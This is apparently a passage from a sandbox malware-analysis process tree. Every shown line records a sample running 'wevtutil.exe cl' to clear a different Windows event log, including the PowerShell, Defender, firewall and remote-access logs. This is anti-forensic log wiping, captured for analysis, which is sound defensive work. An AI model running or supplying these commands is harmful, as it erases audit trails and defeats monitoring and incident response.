C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Operational"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Operational"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NTLM/Operational"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetShell/Performance"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Admin"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Debug"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Operational"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/Debug"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Recovery/Operational"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sens/Debug"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Setup/Analytic"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorPort/Operational"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/Main"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"3⤵PID:1532
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"3⤵PID:632
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"3⤵PID:1052
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"3⤵PID:792
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"3⤵PID:1060
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"3⤵PID:1832
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"3⤵PID:2044
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"3⤵PID:1056
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"3⤵PID:316
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"3⤵PID:1160
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"3⤵PID:1964
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"3⤵PID:1924
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"3⤵PID:1340
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"3⤵PID:1604
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"3⤵PID:1320
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"3⤵PID:368
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"3⤵PID:396
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"3⤵PID:748
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"3⤵PID:1148
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TunnelDriver"3⤵PID:992
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"3⤵PID:1308
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC/Operational"3⤵PID:2040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"3⤵PID:1348
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"3⤵PID:1156
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"3⤵PID:1108
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"3⤵PID:436
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"3⤵PID:1932
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"3⤵PID:1048
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"3⤵PID:1800
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"3⤵PID:892
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"3⤵PID:1212
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"3⤵PID:668
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"3⤵PID:952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"3⤵PID:1532
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"3⤵PID:972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"3⤵PID:1972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Analytic"3⤵PID:1116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Operational"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMI-Activity/Debug"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMI-Activity/Operational"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"3⤵PID:616
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"3⤵PID:868
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"3⤵PID:2004
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"3⤵PID:1692
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WUSA/Debug"3⤵PID:932
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"3⤵PID:632
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"3⤵PID:1052
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"3⤵PID:792
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"3⤵PID:1060
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"3⤵PID:1576
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"3⤵PID:2044
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"3⤵PID:1056
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"3⤵PID:316
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Power"3⤵PID:1160
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Render"3⤵PID:1964
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"3⤵PID:1924
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"3⤵PID:1340
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"3⤵PID:1604
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"3⤵PID:1320
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"3⤵PID:368
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Debug"3⤵PID:396
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Operational"3⤵PID:748
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"3⤵PID:1148
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"3⤵PID:992
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"3⤵PID:1308
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"3⤵PID:2040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"3⤵PID:1348
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"3⤵PID:1156
-
-
